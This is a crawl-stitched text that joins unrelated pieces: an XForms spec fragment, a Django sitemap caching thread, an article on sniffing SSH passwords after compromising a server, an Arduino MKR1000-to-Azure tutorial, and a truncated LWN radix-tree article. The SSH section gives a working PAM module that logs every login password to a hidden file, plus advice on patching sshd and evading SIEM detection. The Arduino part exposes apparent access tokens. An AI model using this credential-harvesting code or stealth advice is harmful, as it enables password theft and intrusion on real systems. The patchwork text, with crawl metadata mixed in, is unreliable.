; otherwise, if the
resource attribute provides
an external source for the initial instance, that is used instead to obtain the XPath data model. If the external initial
instance data is not well-formed XML or cannot be retrieved, processing halts with an exception (4.5.4 The xforms-link-exception Event).
If there are no
instance elements, the data model is not constructed in this phase, but during user interface construction
(4.2.2 The xforms-model-construct-done Event).
If applicable, P3P initialization occurs. [P3P 1.0]
Perform the behaviors of
xforms-rebuild,
xforms-recalculate, and
xforms-revalidate in sequence
on this
model element
without dispatching events to invoke the behaviors.
The notification event markings for these operations are discarded, and the
xforms-refresh behavior single node binding expression is evaluated, if it exists on the form control, to ensure that it points to a node that exists. If this is not the case then the form control should behave in the same manner as if it had bound to a model item with the
relevant model item property resolved to
false.
Otherwise, the user interface for the form control is created and initialized.).
The above steps comprise the default processing of
xforms-model-construct-done.
After all form controls have been initialized and all
xforms-model-construct-done events have been processed,: a request to rebuild the internal data structures that track computational dependencies within a particular XForms Model.
Target:
model
Bubbles: Yes
Cancelable: Yes
Context Info: None
The default action for this event results in the following:
All model item pro | http://www.w3.org/TR/xforms11/index-diff.html | crawl-001 | refinedweb | 5,436 | 52.46 |
I have a site with about 150K pages in its sitemap. I'm using the sitemap index generator to make the sitemaps, but really, I need a way of caching it, because building the 150 sitemaps of 1,000 links each is brutal on my server.[1]
I COULD cache each of these sitemap pages with memcached, which is what I'm using elsewhere on the site...however, this is so many sitemaps that it would completely fill memcached....so that doesn't work.
What I think I need is a way to use the database as the cache for these, and to only generate them when there are changes to them (which as a result of the sitemap index means only changing the latest couple of sitemap pages, since the rest are always the same.)[2] But, as near as I can tell, I can only use one cache backend with django.
How can I have these sitemaps ready for when Google comes-a-crawlin' without killing my database or memcached?
Any thoughts?
[1] I've limited it to 1,000 links per sitemap page because generating the max, 50,000 links, just wasn't happening.
[2] for example, if I have sitemap.xml?page=1, page=2...sitemap.xml?page=50, I only really need to change sitemap.xml?page=50 until it is full with 1,000 links, then I can it pretty much forever, and focus on page 51 until it's full, cache it forever, etc.
EDIT, 2012-05-12: This has continued to be a problem, and I finally ditched Django's sitemap framework after using it with a file cache for about a year. Instead I'm now using Solr to generate the links I need in a really simple view, and I'm then passing them off to the Django template. This greatly simplified my sitemaps, made them perform just fine, and I'm up to about 2,250,000 links as of now. If you want to do that, just check out the sitemap template - it's all really obvious from there. You can see the code for this here:
I had a similar issue and decided to use django to write the sitemap files to disk in the static media and have the webserver serve them. I made the call to regenerate the sitemap every couple of hours since my content wasn't changing more often than that. But it will depend on your content how often you need to write the files.
I used a django custom command with a cron job, but curl with a cron job is easier.
Here's how I use curl, and I have apache send /sitemap.xml as a static file, not through django:
curl -o /path/sitemap.xml
Okay - I have found some more info on this and what amazon are doing with their 6 million or so URLS.
Amazon simply make a map for each day and add to it:
So this means that they end up with loads of site-maps - but the search bot will only look at the latest ones - as the updated dates are recent. I was under the understanding that one should refresh a map - and not include a url more than once. I think this is true. But, Amazon get around this as the site maps are more of a log. A url may appear in a later site-map - as it maybe updated - but Google wont look at the older maps as they are out of date - unless of course it does a major re-index. This approach makes a lot of sense as all you do is simply build a new map - say each day of new and updated content and ping it at google - thus google only needs to index these new urls.
This log approach is a synch to code - as all you need is a static data-store model that stores the XML data for each map. your cron job can build a map - daily or weekly and then store the raw XML page in a blob field or what have you. you can then serve the pages straight from a handler and also the index map too.
I'm not sure what others think but this sounds like a very workable approach and a load off ones server - compared to rebuilding huge map just because a few pages may have changed.
I have also considered that it may be possible to then crunch a weeks worth of maps into a week map and 4 weeks of maps into a month - so you end up with monthly maps, a map for each week in the current month and then a map for the last 7 days. Assuming that the dates are all maintained this will reduce the number of maps tidy up the process - im thinking in terms of reducing 365 maps for each day of the year down to 12.
Here is a pdf on site maps and the approaches used by amazon and CNN.
I'm using django-staticgenerator app for caching sitemap.xml to filesystem and update that file when data updated.
settings.py:
STATIC_GENERATOR_URLS = ( r'^/sitemap', ) WEB_ROOT = os.path.join(SITE_ROOT, 'cache')
models.py:
from staticgenerator import quick_publish, quick_delete from django.dispatch import receiver from django.db.models.signals import post_save, post_delete from django.contrib.sitemaps import ping_google @receiver(post_delete) @receiver(post_save) def delete_cache(sender, **kwargs): # Check if a Page model changed if sender == Page: quick_delete('/sitemap.xml') # You may republish sitemap file now # quick_publish('/', '/sitemap.xml') ping_google()
In nginx configuration I redirect sitemap.xml to cache folder and django instance for fallback:
location /sitemap.xml { root /var/www/django_project/cache; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header Host $http_host; if (-f $request_filename/index.html) { rewrite (.*) $1/index.html break; } # If file doesn't exist redirect to django if (!-f $request_filename) { proxy_pass; break; } }
With this method, sitemap.xml will always be updated and clients(like google) gets xml file always staticly. That's cool I think! :)
For those who (for whatever reason) would prefer to keep their sitemaps dynamically generated (eg freshness, lazyness). Try django-sitemaps. It's a streaming version of the standard sitemaps. Drop-in replacement. Much faster response time and uses waaaaay less memory. | http://m.dlxedu.com/m/askdetail/3/f35fcc112a64341f9bb8f52dae56a682.html | CC-MAIN-2018-22 | refinedweb | 1,055 | 70.53 |
Sam Landfried
In my previous post, we created a simple UI component with Facebook’s React library. Now, we’ll create data flows between multiple components.
Let’s build an app that takes the input from a textfield and displays it as rot13.
We’ll structure the app like so:
And, the components we’ll build are:
It may not be obvious right now, but the container is essential. Every React component must return a single element. In order for us to display both the Input and the Output components, they need to be inside another component.
We’ll start with our boilerplate HTML, making sure to include the libraries for React and for the JSX Transformer. Remember, when you work with JSX, you need to include the
/** @jsx React.DOM */ directive and specify the script’s type as
text/jsx.
For each component, we pass in a “spec” object that has a render function.
<!DOCTYPE html> <html> <head> <script src=""></script> <script src=""></script> </head> <body> <div id="container"></div> <script type="text/jsx"> /** @jsx React.DOM */ var InputComponent = React.createClass({ render: function () { } }); var OutputComponent = React.createClass({ render: function () { } }); var AppComponent = React.createClass({ render: function () { } }); React.renderComponent( <AppComponent />, document.getElementById('container') ); </script> </body> </html>
Next, we need the render function of our components to return values.
var InputComponent = React.createClass({ render: function () { return ( <input></input> ); } }); var OutputComponent = React.createClass({ render: function () { return ( <div></div> ); } }); var AppComponent = React.createClass({ render: function () { return ( <div> <InputComponent /> <OutputComponent /> </div> ); } }); React.renderComponent( <AppComponent />, document.getElementById('container') );
Notice that the
AppComponent returns a
<div> with the
InputComponent and
OutputComponents nested inside of them. When the
AppComponent’s
render function is called, the
render functions of the
InputComponent and
OutputComponent are called as well. This produces a DOM tree roughly equivalent to:
<div> <input /> <div></div> </div>
We need a way to get data from one component to another. React has a simple, but sophisticated, system for moving data around. Here is how we might get the static text “Ni hao, React” from our
AppComponent to our
OutputComponent:
var InputComponent = React.createClass({ render: function () { return ( <input></input> ); } }); var OutputComponent = React.createClass({ render: function () { return ( <div>{ this.props.value }</div> ); } }); var AppComponent = React.createClass({ render: function () { return ( <div> <InputComponent /> <OutputComponent value="I know kung fu" /> </div> ); } }); React.renderComponent( <AppComponent />, document.getElementById('container') );
Our
AppComponent provides a
value attribute to the
OutputComponent. Then, the
OutputComponent accesses this attribute as a property of
this.props.
This is an example of React’s one-way data flow. Every component has access to a
props object, and those properties are added to this
props object by the parent component. The property names can be any valid JavaScript variable name, and the value can be any valid JavaScript value or expression.
Here, we named the property “value,” but it could have easily been “stringToDisplay” or “outputText.”
To access the value in the
OutputComponent’s JSX, you wrap it in single curly braces. This tells the JSX Transformer to evaluate whatever JavaScript expression is inside those curly braces.
The values passed from a parent component to a child component do not have to be static. The first step is the let the
AppComponent maintain its own store of dynamic data. A
state variable, like the
props variable, is available to every component. But
state is the data that is owned by a component, as opposed to being provided by a parent component.
Let’s update the code so that the
AppComponent sets up an initial
state object for holding data, and passes some of that data to the
OutputComponent.
var AppComponent = React.createClass({ getInitialState: function () { return { value: "I know kung fu!!!!", } }, render: function () { return ( <div> <InputComponent /> <OutputComponent value={ this.state.value } /> </div> ); } }); React.renderComponent( <AppComponent />, document.getElementById('container') );
This code has the equivalent outcome as the previous version, but reveals a little bit more about how to use React effectively. The
getInitialState function is called automatically and sets up the
state object for a component. We can return any object, and are specifying an object literal for the sake of simplicity.
To pass some of our
AppComponent’s state data to the
OutputComponent, we use attributes, as we did before. But this time, instead of a static string value, we use the expression
this.state.value, wrapped in single curly braces.
Note that we do not wrap
{ this.state.value } in quotes. If we did that, it would be passing a string, and not the actual JavaScript value we intended.
It’s time to complete our data flow by connecting our
InputComponent’s input element to our
AppContainer’s state. First, we will watch for the
change event on the input.
var InputComponent = React.createClass({ _changeHandler: function (event) { console.log(event.target.value); }, render: function () { return ( <input onChange={ this._changeHandler } ></input> ); } });
Again, we make use of attributes to declare how our components should interact. Technically, the
<input> element is a React component, and we are specifying its
onChange attribute. We pass it
this._changeHanlder as the value, and we declare a
_changeHandler property as part of our component’s spec.
onChange is an attribute that is baked into React. You can find a list of supported event attribute names in the Event System documentation on the React site.
Alternatively,
_changeHandler is a name that we made up arbitrarily. One convention that is popular in the React community is to prefix your custom functions with an underscore. This is a good way to communicate that this is a function that you have declared, and is not one of React’s built in component functions.
We define
_changeHandler just like any other DOM event handler callback; it should accept a parameter for the event object. Currently, it is only logging the value of the input. To make it do something more interesting, we’ll need to make a couple of changes to the
AppComponent.
We will update
AppComponent by adding a function that updates its state, and we will pass a reference to this function to
InputComponent.
var AppComponent = React.createClass({ getInitialState: function () { return { value: "I know kung fu!!!!", } }, _updateValue: function (newValue) { this.setState({ value: newValue }); }, render: function () { return ( <div> <InputComponent sendChange={ this._updateValue }/> <OutputComponent value={ this.state.value} /> </div> ); } });
We have created an
_updateValue function that calls the built in
setState component function. It accepts an object whose properties will overwrite the existing state. When you call
setState, you only have to specify the ones you want to update, even if your component’s state has many other properties.
We declare an attribute for
InputComponent named
sendChange and give it a reference to
_updateValue.
InputComponent now has access to this function reference in its
props object. Let’s use that to complete the data flow.
var InputComponent = React.createClass({ _changeHandler: function (event) { this.props.sendChange(event.target.value); }, render: function () { return ( <input onChange={ this._changeHandler } ></input> ); } });
Now, when you type into the input field, output updates immediately. Right now, it’s in plain text. Let’s fix that.
We need to add our rot13 function to the
OutputComponent and call it in our
render function.
var OutputComponent = React.createClass({ _rot13: function (s) { return s.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c<="Z"?90:122)>=(c=c.charCodeAt(0)+13)?c:c-26);}); }, render: function () { return ( <div>{ this._rot13(this.props.value) }</div> ); } });
Now, our output, though not anywhere near NSA-proof, is unreadable by normal humans. Hooray!
React Components act as neat little boxes that take some input and produce a piece of your UI. Each one has limited responsibilty, which makes it easier for you to reason about your app. While building this app, you learned how to pass data and function references using
props and
state. Then you made these data flows reactive via Event attributes. Next time, we’ll work on an even larger application and examine the benefits of React over other frameworks. | https://www.bignerdranch.com/blog/how-to-use-facebooks-react-library-to-build-UIs-part-2/ | CC-MAIN-2018-51 | refinedweb | 1,317 | 51.24 |
I can't figure out the answer to this homework problem:
Write a static method named countEmptyBowls, to be added to the Bowl class, which is passed an array of Bowl objects, and returns the (int) number of Bowl objects in the array that are empty.
Bowl Class:
public class Bowl { private double weight; private boolean empty; private String origin; // country of manufacture public Bowl(double w, boolean e, String origin) { weight = w; empty = e; this.origin = origin; } public double getWeight() { return weight; } public boolean getEmpty() { return empty; } public String getOrigin() { return origin; } public void setEmpty(boolean emptyStatus) { empty = emptyStatus; } public String toString() { return ("from " + origin + " weight: " + weight); } }
This is my most recent try for the method:
public int countEmptyBowls(int[] Bowl){ int count = 0; for(k = 0;k<Bowl.length;k++){ if(k.getEmpty()== true) count++; return count;}
This didn't work. Ive tried a few other things but they didn't work either :'(
Thanks for helping! | http://www.javaprogrammingforums.com/whats-wrong-my-code/26314-simple-array-problem.html | CC-MAIN-2015-48 | refinedweb | 158 | 50.7 |
Learn to Use ITensor
Index Objects
The most basic element of ITensor is not actually a tensor: it is a tensor index,
an object of type
Index. (By tensor index we mean i,j, or k in an expression
like @@T_{ijk}@@ ).
ITensors are "intelligent tensors" because they "know" what indices they have. This is possible since an Index carries extra information beyond its size.
The simplest way to construct an Index is to give its name and size:
auto i = Index("index i",3);
Upon creation, an Index gets "stamped" with a permanent, hidden id number that allows copies of the Index to recognize each other. Typically you do not need to look at these id numbers; it is enough to know that indices match (compare equal) if they are copies of the same original index:
auto j = i; //make a copy of i Print(j==i); //prints: j==i = true
(also they must have the same "prime level"; see next section).
Neither the name nor size are used to compare indices, because two different indices could accidentally have the same name and size.
To access the size of an Index, use its
.m() method
println("The size of ",i.name()," is ",i.m()); //prints: The size of index i is 3
The convention of calling the size "m" comes from the DMRG literature.
#include "itensor/all_basic.h" using namespace itensor; int main() { auto i = Index("index i",3); println("The size of ",i.name()," is ",i.m()); return 0; }
After creating an Index, most of its properties are permanently fixed, including its size. The philosophy of ITensor is that indices have a meaning given at the time they are created. A new Index can be created to take the place of an old one, but the semantic meaning of a given Index object cannot be changed.
Priming Indices
There is one property of an Index you can change: its prime level.
An Index starts out with prime level zero. Copies of the same original Index must have the same prime level to compare equal.
Calling
prime(i) will produce a copy of i with prime level raised by 1.
Because this copy has a different prime level, it will no longer compare equal to i.
auto i1 = prime(i); println("The prime level of i1 is ",i1.primeLevel()); //prints: The prime level of i1 is 1 printfln("i1==i is %s",i1==i); //prints: i1==i is false
There are many convenient ways to manipulate Index prime levels.
The
prime function accepts an optional increment amount:
auto i3 = prime(i,3); println(i3.primeLevel()); //prints: 3
Calling
noprime resets the prime level to zero.
auto i0 = noprime(i3); println(i0.primeLevel()); //prints: 0
Note that the above names (
i3,
i0, etc.) are just
for pedagogical reasons—you can use any variable names
you want regardless of the prime level.
We will see more ways to manipulate primes as we work with ITensors with multiple indices.
Printing Indices
Printing an Index shows useful information about it:
auto i = Index("index i",3,Link); println(i); //prints: ("index i",3,Link|587)
The output shows the name, size, and IndexType of i. The last number is part of the id number of the Index. Id numbers are random 64 bit integers and vary each time you run your program.
The prime level is displayed at the end:
println(prime(i,2)); //prints: ("index i",3,Link|587)'' println(prime(i,10)); //prints: ("index i",3,Link|587)'10
Index Types
The Index constructor accepts an optional
IndexType argument:
auto s2 = Index("site 2",2,Site); //IndexType set to Site
IndexTypes are useful because they allow you to manipulate or retrieve indices of a certain type. IndexTypes can be thought of as labels that distinguish broad categories of indices, such as "physical" versus "virtual" indices.
In addition to the IndexTypes pre-defined by ITensor, you can define a custom IndexType
auto MyType = IndexType("MyType");
and use it to create indices of this type
auto m1 = Index("m1",5,MyType); auto m2 = Index("m2",7,MyType);
Internally, IndexType data is just a fixed-size, constant string, and can be up to 7 characters long.
The IndexType of an Index can be obtained by calling the
.type() method.
println("The type of m1 is ",m1.type()); //prints: The type of m1 is MyType
For a complete listing of all of the methods of class Index, view the detailed documentation.
ITensor Library Overview
ITensor Basics
| http://itensor.org/docs.cgi?page=book/index | CC-MAIN-2019-18 | refinedweb | 751 | 62.17 |
Gaining Lateral Movement with SSH Password Sniffing
Sometimes the best way to gain lateral movement during a penetration test is to steal a password. Here’s how to sniff passwords from a running SSH server.
If you’ve managed to gain a remote shell onto a Linux server and elevated your privileges to root (congrats!), the next step is to maintain your access and gain lateral movement around the network. If you’ve been unable to find anything on the compromised server that would indicate a password for any system, including the compromised server, you can always try to sniff SSH passwords straight out of OpenSSH. You can even be doing this while attacking password hashes offline. I always prefer multiple options that race each other to the correct answer.
The Reality of SSH Passwords
Lateral movement through OpenSSH password sniffing is a very viable concept because:
- People use the same username and password combinations on multiple systems
- Passwords often follow a common pattern which can be used to predict other passwords on the estate
- People type valid passwords into the wrong servers.
- Given enough time, someone will always login
There are exceptions to the above but unfortunately, most organisations are not that mature.
3 Ways to Sniff SSH Passwords on a Compromised Server
1. Replace OpenSSH with a Dedicated Honeypot Application
The easiest way to sniff SSH passwords is to replace the OpenSSH application with a honeypot. Which honeypot you choose will depend on what you’re trying to achieve. To help you decide, these are the three different categories of SSH honeypots.
- Low Interaction. A low interaction SSH honeypot will present a user with a login prompt when connecting, may allow a user to ‘log in’ with any username and password, and will allow users to type commands into a terminal session that don’t actually do anything but log. Limited or no feedback is given. After a few seconds of using one of these, it is obvious that you’re not actually using a real shell.
- Medium Interaction. A medium interaction SSH honeypot will allow a user to ‘log in’ and use a limited set of commands. Executing these commands will change the imagined state inside the rest of the ‘server’. All other commands will do nothing but log.
- High Interaction. These are very complex honeypots that behave just like the real thing. In reality, this is usually just an intercepting proxy to a real SSH daemon on the server. It will use the host's certificates and signatures and log and relay any keystrokes given. The aim is that the server can be restored whenever required.
There are a lot of SSH honeypots available. Some examples you could use are:
- Kippo — medium interaction, inspired by Kojoney2
- Cowrie — medium interaction in normal mode, high interaction when proxying to a real OpenSSH port
- Kojoney2 — medium interaction
- SSH Honeypot — low interaction
- Dockpot — medium interaction
- HonSSH — high interaction as a proxy to a real OpenSSH port
- sshesame — low interaction
- sshipot — high interaction as a proxy to a real OpenSSH port
Choosing and Implementing a Honeypot
Stealth is really important. If the owners of the system detect your presence they’re going to shut you off very quickly. For this reason, replacing OpenSSH with a low or medium interaction honeypot isn’t going to work very well. A better option is to:
- Move OpenSSH from the existing port (usually 22) to another unused port (such as 2222)
- Configure OpenSSH to listen only on the loopback network interface (127.0.0.1 or localhost) so that it can’t be discovered remotely.
- Install your high interaction honeypot (intercepting proxy) onto port 22 and proxy traffic to the original OpenSSH now on 127.0.0.1:2222
- Configure your honeypot to present the original certificates used by OpenSSH to ensure that the server signature stays the same
With a high interaction/proxy honeypot, you’ll be able to capture all usernames, passwords, and commands used by the systems administrators over an extended period of time. Or at least until they spot the compromise. Anytime anyone logs in or executes are remote script, everything they type or send will be logged into the honeypot logs. Make sure the logs are hard to detect, don’t get too big, and are regularly shipped offsite and truncated.
The benefit of this method is that anything the user does after logging in is also logged. This means we get to see any other passwords they enter, commands they run, servers they talk to, and the context within which they’re working. Even if their shell doesn’t log to a .bash_history file, we still get the history of what they’ve done.
2. Extend OpenSSH with a PAM module
If you’re unable to move OpenSSH to another port and install an intercepting proxy honeypot, you can instead extend OpenSSH with a custom PAM module. The basic steps required are:
- Install the prerequisite packages
- Install the custom PAM module
- Restart sshd to pick up the new module
On an ubuntu based system the PAM Python prerequisites can be installed with:
apt-get install python libpam-python
I’ve updated a PAM module I found at the defunct chokepoint.net (via web.archive.org). The module now logs all usernames and passwords, regardless of whether or not the username or password was valid. The output is written to a custom file instead of using Syslog as we don’t want to log to the local auth.log file and any connected SIEM tools. That would be a bit obvious.
import crypt, spwd,def auth_log(msg):
f=open("/tmp/auth","a+")
f.write(msg)
f.close()def check_pw(user, password):
"""Check the password matches local unix password on file"""
hashed_pw = spwd.getspnam(user)[1]
return crypt.crypt(password, hashed_pw) == hashed_pwdef pam_sm_authenticate(pamh, flags, argv):
try:
user = pamh.get_user()
except pamh.exception, e:
return e.pam_result
if not user:
auth_log("Remote Host: {} ({}:Error-UnknownUser)".format(pamh.rhost, user))
return pamh.PAM_USER_UNKNOWN
try:
resp = pamh.conversation(pamh.Message(pamh.PAM_PROMPT_ECHO_OFF, 'Password:'))
except pamh.exception, e:
return e.pam_resultauth_log("Remote Host: {} ({}:{})".format(pamh.rhost, user, resp.resp))
if not check_pw(user, resp.resp):
return pamh.PAM_AUTH_ERR
return pamh.PAM_SUCCESSdef pam_sm_setcred(pamh, flags, argv):
return pamh.PAM_SUCCESSdef pam_sm_acct_mgmt(pamh, flags, argv):
return pamh.PAM_SUCCESSdef pam_sm_open_session(pamh, flags, argv):
return pamh.PAM_SUCCESSdef pam_sm_close_session(pamh, flags, argv):
return pamh.PAM_SUCCESSdef pam_sm_chauthtok(pamh, flags, argv):
return pamh.PAM_SUCCESS
craighays/pam-python-common-auth
Contribute to craighays/pam-python-common-auth development by creating an account on GitHub.
github.com
To install this module, save it to a file in /lib/security/ such as /lib/security/common-auth.py and update the file /etc/pam.d/sshd to comment out the @include common-auth line and add our new script instead:
#@include common-auth
auth requisite pam_python.so common-auth.py
Restart sshd and you should start to see login attempts, both failed and successful, appearing in your custom output file /tmp/auth. Don’t forget to check the true /var/log/auth.log file for any errors which would give away what you’re doing. If anything appears, get them fixed before moving on.
3. Patch the Compiled OpenSSH Binary to Capture Passwords
Instead of proxying traffic to OpenSSH or extending it with a custom PAM module, you can simply replace the /usr/sbin/sshd binary with a modified version that writes passwords out to a predefined location. The process for this would be:
- Identify the version of sshd installed and running on the server
- Download the source code for that version of sshd (offline)
- Patch the source code to write the output to file of your choice (offline)
- Compile sshd (offline)
- Copy the modified sshd binary to the compromised server and replace the existing binary with the new one. You’ll need to backup the existing binary so that you can restore it after the engagement ends.
You can find the version of sshd that is running by simply executing the command:
/usr/sbin/sshd -v
This will generate a usage error but it contains the version number which is what we’re looking for!
The source code for each release of OpenSSH can be found in the branches section of the official OpenSSH GitHub repository. Clone it to your local machine and apply the patch to auth-passwd.c you can find in Brad Tilley’s sshlog and then compile as normal. The output will include an sshd binary we can upload back to the compromised server, hot-swap with the existing binary, and then restart the service.
Once SSH is listening with the new binary, usernames and passwords should be logged in your custom log file.
How to Protect Against SSH Password Sniffing
If you’re still using SSH passwords you’re at risk. Key-based authentication is the way to go. Even if a single session authentication is sniffed, you can’t capture the key that generated the authentication response, only the response itself. The user’s private key remains protected.
Originally published at on February 19, 2020. | https://craighays.medium.com/gaining-lateral-movement-with-ssh-password-sniffing-e72fea5f8734 | CC-MAIN-2021-10 | refinedweb | 1,516 | 55.24 |
Components and supplies
Apps and online services
About this project
Paul DeCarlo has a great article on sending weather data from a Particle Photon to Microsoft Azure. I wanted to duplicate this with the new Arduino MKR1000.
The Photon uses a webhook to send data from the Particle cloud to Azure. Since the MKR1000 supports HTTPS, data can be sent directly to Azure. This guide will get your MKR1000 connected to Azure and reuse a lot of the server side code from the Microsoft Connect the Dots project.
Hardware
A DHT22 sensor is used to measure temperature and humidity. You could also modify the code to support the DHT11 sensor. Wire the DHT sensor on the breadboard. Send 3.3 volts from the MKR1000 to the first pin. Place a 10,000Ω pullup resistor from 3.3V to pin 2. Connect pin 3 to ground. Run a wire from pin 2 on the DHT22 to pin 6 on the MKR1000.
For more info on DHT22, see Adafruit's DHT tutorial.
Arduino IDE
Open the Arduino IDE. Use the Boards Manager to install the MKR1000 board. Use the Library Manager to install the WiFi101 library.
HTTPS
The Arduino MKR1000 supports HTTPS, but we need to manually install the certificates for the sites we will visit. This is necessary since the memory on the device is limited. This is a two step process. First we load a sketch on the board and then run a program on our computer to upload the certificates.
Use the Arduino IDE to load the Firmware Updater Sketch onto your board.
Examples -> WiFi101 -> Firmware Updater
Download the WiFi101 Firmware Updater. Unzip the archive and run winc1500-uploader-gui.exe.
The HTTPS certificate for Azure Event hubs is issued to servicebus.windows.net so any service bus URL should work. Enter ctd-ns.servicebus.windows.net in the text field. Choose your COM port and upload the certificates.
Arduino Sketch
Clone or download the Arudino sketch from. Edit the ssid tab and change the
ssid[] and
password[] to match your network settings. Upload the sketch to your MKR1000 board.
If you get errors, you might need to use the Arduino Library Manger (Sketch -> Include Library -> Manage Libraries...) to install the "DHT sensor library", ArduinoJson, or RTCZero library.
Open the Arduino Serial Monitor (Tools -> Serial Monitor) and ensure that data is begin sent to Azure.
The sketch reuses an Event hub from the connect the dots project. This means that we can use the existing Azure web app to view our data. Open in your browser. You should see data from MKR1000. Since this is a "public" event hub, your sensor data will be mixed with other sensors. If multiple people are running this MKR1000 code, you might want to change the
displayname or
guid in the
createJSON function.
Creating your own Event Hub
Running against the existing Event hub is OK, but you can also create your own event hub for your data. This requires Visual Studio and an Azure subscription. The Free Visual Studio 2015 Community edition works fine. You can also sign up for a free Azure trial subscription.
We'll be using code from the Connect the Dots project. Clone project with git or use the Download ZIP button on the Github page.
git clone
You can follow Microsoft's instructions to for creating the Azure resources which takes a while but gives you a deep understanding of how the pieces are put together. I suggest using the AzurePrep project from the cloned repository to automatically create these resources.
Use Visual Studio and open the AzurePrep Solution from connectthedots\Azure\AzurePrep. Run the AzurePrep project in Release Mode.
The application will open some windows prompting you to log into Azure in and grant permission to your resources. After that, answer a bunch of questions in the terminal to create the resources.
You need to choose a name for resources. The connect the dots documentation recommends the name ctd (connect the dots) + your initials. For example, I chose "ctddc".
Back in Visual Studio, run the CreateWebConfig target from AzurePrep to create a configuration file for the website. Login, follow the prompts. A web.config file will be written to the desktop.
Copy web.config from your Desktop into the connectthedots website project, connectthedots\Azure\WebSite\ConnectTheDotsWebSite.
Open ConnectTheDotsWebsite solution from connectthedots\Azure\WebSite in Visual Studio.
You need to add the new web.config file to the project. Right click the solution in Solution Explorer. Choose "Add -> Existing Item..." from the menu. Navigate into ConnectTheDotsWebSite and add web.config.
Run the project in Microsoft Edge. You won't see any data until we update the sketch on the MKR1000.
The Arduino sketch needs a SAS key to access the Azure resources. Use Sandrino Di Mattia's Event Hubs Signature Generator tool to generate the key in the correct format. Download from. Unzip the tool and launch RedDog.ServiceBus.EventHubs.SignatureGenerator.
Fill in the UI using the namespace you created before. Since I used ctddc when creating the Azure resources, my namespace is ctddc-ns. The hub name is ehdevices. The publisher and sender key name should both be D1. I set the Token TTL for 1 year (525,600 minutes). The signature should be good for the life of the device.
You need to log into the Azure Portal to get the sender key. From the left menu, choose browse, and use the filter to find Event hubs.
Event hubs opens a new window in the old Azure portal.
- Click on the namespace you created.
- Choose Event Hubs
- Choose ehdevices
- Choose configure
- Scroll to the bottom and copy the primary key for D1
Switch back to the Signature Generator tool and paste the key into the Sender Key Field. Click the Generate button to generate a signature.
Copy the generated signature.
Open the MKR1000-Azure sketch in the Arduino IDE again. We need to replace the
hostname[] and
authSAS[] variables with our new event hub settings. Paste the generated signature into the
char authSAS[] field. Edit the hostname field to match your hostname. e.g.
char hostname[] = "ctddc-ns.servicebus.windows.net";
Save the sketch and upload it to your MKR1000. Optionally open the Serial Monitor and check that data is begin sent to Azure.
ALT+TAB to the connect the dots website running in Microsoft Edge and you should start seeing data from your device.
IoT Hub
Azure IoT hub is newer than Event hub and may be more appropriate for your project. IoT Hub supports device-to-cloud messaging (like this project) and cloud-to-device messaging.
Use the Azure Portal to create a new IoT Hub.
Device Explorer is used to generate signatures for accessing IoT hub. Download SetupDeviceExplorer.msi from.
Go back the the Azure Portal and open the new Iot hub. Click on the key icon, select the iothubowner row, copy the connection string for the primary key.
Open Device Explorer, paste in the connection string, click update.
Click on the Management tab. Click the create button under Actions. Enter D1 as the Device ID and click Create.
Highlight the D1 row and click the SAS Token button and generate a new token.
Open the MKR1000-Azure sketch in the Arduino IDE.
Replace the
hostname[] with your IoT hub name + ".azure-devices.net". Update
authSAS[] with the value generated with Device Explorer. Be sure to only copy the portion of the SAS Token after "SharedAcessSignature=". Adjust the URI to point to IoT hub.
char hostname[] = "hacksterdemo.azure-devices.net"; char authSAS[] = "SharedAccessSignature sr=hacksterdemo.azure-devices.net%2fdevices%2fD1&sig=jnyTV8j2%2bY9BJ9fyEdb7zu3eAVphRyul1b6BG%2fVcRhQ%3d&se=1490944761"; String deviceName = "D1"; String uri = "/devices/" + deviceName + "/messages/events?api-version=2016-02-03";
Edit the code in the sendEvent function that checks for a valid response. Event hub sends a HTTP 201 to indicate success. IoT hub sends a HTTP 204.
Change
if (response.startsWith("HTTP/1.1 201")) {
To
if (response.startsWith("HTTP/1.1 204")) {
Use the Arduino IDE to upload the sketch to your Arduino MKR1000.
Switch the Data tab in Device Explorer. Click the monitor button to view data being sent to the Event Hub.
Since this project is sending data from device-to-cloud, I'm using HTTP POST to send the data. There are also libraries for sending and receiving data with Azure IoT hub. Unfortunately, IMO they're not very Arduino-like or user friendly yet. If you want your device to receive data from Azure, the libraries might be more helpful. Alternately, check out Mohan Palanisamy's blog post about sending data from IoT hub to a MKR1000.
This post showed how to send sensor data from MRK1000 to Azure Event hubs and Iot hub. We used existing code view and graph the data. Check out the connect the dots project for more ways to write code for storing, manipulating and viewing your data with Azure.
Now that you're done, you might want to shut down or delete resources that you're not using to limit the amount of money you're charged. The AzurePrep solution has a ClearResources project to help you remove the Azure services.
Schematics
Code
Device Explorer
Connect the Dots
MKR1000-Arduino
WiFi101 Firmware Updater
Event Hubs Signature Generator
Author
Don Coleman
- 1 project
- 8 followers
Additional contributors
- Hands-on-lab particle photon weather station in azure by Paul DeCarlo
- Created connect the dots project by Connect the Dots team
- Awesome photos of mkr1000 by Ken Rimple
Published onMarch 31, 2016
Members who respect this project
you might like | https://create.arduino.cc/projecthub/doncoleman/mkr1000-temp-and-humidity-sensor-8f22ed?ref=platform&ref_id=424_trending___tutorial&offset=0 | CC-MAIN-2017-13 | refinedweb | 1,598 | 68.16 |
"
Wikipedia has a radix
tree article, but Linux radix trees are not well described by that
article. A Linux radix tree is a mechanism by which a (pointer) value can
be associated with a (long) integer key. It is reasonably efficient in terms of
storage, and is quite quick on lookups. Additionally, radix trees in the
Linux kernel have some features driven by kernel-specific needs, including
the ability to associate tags with specific entries.
The cheesy diagram on the right shows a leaf node from a Linux radix tree.
The node contains a number of slots, each of which can contain a pointer to
something of interest to the creator of the tree. Empty slots contain a
NULL pointer. These trees are quite broad - in the 2.6.16-rc
kernels, there are 64 slots in each radix tree node. Slots are indexed by
a portion of the (long) integer key. If the highest key value is less than
64, the entire tree can be represented with a single node.
Normally, however, a rather larger set of keys is in use - otherwise, a
simple array could have been used. So a larger tree might look something
like this:
This tree is three levels deep. When the kernel goes to look up a specific
key, the most significant six bits will be used to find the appropriate
slot in the root node. The next six bits then index the slot in the middle
node, and the least significant six bits will indicate the slot containing a
pointer to the actual value. Nodes which have no children are not present
in the tree, so a radix tree can provide efficient storage for sparse
trees.
Radix trees have a few users in the mainline kernel tree. The PowerPC
architecture uses a tree to map between real and virtual IRQ numbers. The
NFS code attaches a tree to relevant inode structures to keep
track of outstanding requests. The most widespread use of radix trees,
however, is in the memory management code. The address_space
structure used to keep track of backing store contains a radix tree which
